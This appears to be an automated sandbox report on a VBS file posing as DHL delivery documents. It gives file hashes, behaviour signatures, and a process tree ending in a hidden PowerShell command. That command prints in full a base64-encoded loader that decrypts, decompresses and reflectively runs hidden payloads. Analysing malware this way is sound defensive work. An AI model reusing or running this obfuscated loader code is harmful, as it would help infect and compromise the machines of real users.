Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
06/03/2025, 09:33
Static task
static1
Behavioral task
behavioral1
Sample
awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs
Resource
win7-20240729-en
General
-
Target
awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs
-
Size
72KB
-
MD5
f2a4031c9fcc69f1bc32eb62b35651bb
-
SHA1
b97f66f3c831d887c8e1e3e4ca209784262b5c23
-
SHA256
70459c4985da2c11b2baa8b746c86e4cd031470d1c216b2c13b87763c4485647
-
SHA512
7e50b481b4268f474e5ab387c00221d0b29eea79cfbb7a025ddd6cf01aea397c626478b0af94d4ec6d0631fe65f9b331581511060d61c23474066fd665f6b0e6
-
SSDEEP
1536:bdW0MXa09sT3o202+TpydNFMLSEGgcX4XTA66Mrhrpj:bds9DfTpUcfj9pj
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1816 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1816 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 848 wrote to memory of 2588 848 WScript.exe 28 PID 848 wrote to memory of 2588 848 WScript.exe 28 PID 848 wrote to memory of 2588 848 WScript.exe 28 PID 2588 wrote to memory of 2220 2588 cmd.exe 30 PID 2588 wrote to memory of 2220 2588 cmd.exe 30 PID 2588 wrote to memory of 2220 2588 cmd.exe 30 PID 2220 wrote to memory of 1816 2220 cmd.exe 32 PID 2220 wrote to memory of 1816 2220 cmd.exe 32 PID 2220 wrote to memory of 1816 2220 cmd.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents_06_03_2025_00000000000250.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\9TGXY.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\9TGXY.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcnBidHkgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHJwYnR5KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRycGJ0eSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRycGJ0eSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcnBidHkiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24ga3dzcmMoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2E1aElwVlZkMEFLdWNZeWVzMUxmbzcrb0M2NUhJVmZ4aHpGQk9yS0ZBcnc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3pTdDI5dEpLUVVJNnJGbEUrSGtZOWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gc3dxeWsoJHBhcmFtX3Zhcil7CSRxdm5uZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkandlZWQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkZm5vZmw9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkcXZubmQsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGZub2ZsLkNvcHlUbygkandlZWQpOwkkZm5vZmwuRGlzcG9zZSgpOwkkcXZubmQuRGlzcG9zZSgpOwkkandlZWQuRGlzcG9zZSgpOwkkandlZWQuVG9BcnJheSgpO31mdW5jdGlvbiByd3FmaigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHd6b3JtPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGtpYnZhPSR3em9ybS5FbnRyeVBvaW50Owkka2lidmEuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHJwYnR5OyR1dG53bT1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHJwYnR5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbWZlIGluICR1dG53bSkgewlpZiAoJG1mZS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHpkZndoPSRtZmUuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHJqcnNpPVtzdHJpbmdbXV0kemRmd2guU3BsaXQoJ1wnKTskd2pobHg9c3dxeWsgKGt3c3JjIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJqcnNpWzBdKSkpOyR1emh5bj1zd3F5ayAoa3dzcmMgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcmpyc2lbMV0pKSk7cndxZmogJHdqaGx4ICRudWxsO3J3cWZqICR1emh5biAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5e97445f2bbbab34630abb7a04469cb45
SHA15b792df1ebd57ce2a8495cbd654a4796f39f40d2
SHA256508d310faa39b95dd9cfd340dd0e40822675b8b80efafce1b8cd56d764bfc431
SHA5127dc0d816065d1f41cb30aff323b3d2c87e02cecfedd97de9f37e4f3a9bf5079b7d0452b100b7e8b7c108abff9c2ec2079b59a023ec2f87d344ffc2e53b1d6165